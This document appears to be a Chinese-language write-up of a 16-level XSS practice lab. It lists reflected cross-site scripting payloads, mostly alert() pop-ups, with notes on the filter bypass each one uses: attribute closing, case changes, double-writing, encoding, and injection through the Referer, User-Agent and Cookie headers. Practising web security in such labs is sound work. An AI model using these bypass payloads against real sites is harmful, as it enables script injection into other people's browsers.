1.name=<script>alert(1)</script>
2.x"><script>alert(1)</script>
3.' οnfοcus=javascript:alert(123) >
value参数用单引号包裹,用burp看的更清晰;input标签内用onfocus+伪协议
4." οnfοcus=javascript:alert(123) >
5."><a href="javascript:alert(`xss`);">xss</a>
把on变为o_n
6."><a hRef="javascript:alert(`xss`);">xss</a>
检查on和href,但是没有检查大小写
7."><a hrhrefef="javascrscriptipt:alert(`xss`);">xss</a>
删除href,script。双写绕过
8.javascript:alert(1)
目标是将伪协议写入,检查script,部分字母unicode编码绕过
9.javascript:alert(`http://`)
检测到http://才会插入到链接中,直接把http://设为弹出语句
10.keyword=123&t_sort="%20type=text%20οnfοcus="alert(1)
只有t_sort能写入数据,且删除了尖括号。首先把value闭合,然后type=text把input变为输入框,后面再来个双引号闭合value剩下的双引号
11.数据包中添加:referer:" type=text OnfOcus="alert(123)
sort处虽然能传数据,但是过滤了尖括号、双引号,没什么办法。t_ref会捕获数据包中referer的值,会删除javascript,过滤小写的o
12.数据包将UA头改为" type=text OnfOcus="alert(123)
13.数据包添加Cookie: user=" type=text OnfOcus="alert(123)
注意c大写。为什么是user?不知道
14.题目有误
15.网上的解法?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'
源代码中用到了ng-include,思路是包含一个页面,让图片出错,然后弹窗。但是一直做不出来
16.?keyword=<img%0asrc="x"%0aοnerrοr=alert("xss");>
过滤了空格,用/代替也不行,用%0a、%0D可以
比较奇怪的是,我怎么知道他会接收参数keyword。。。
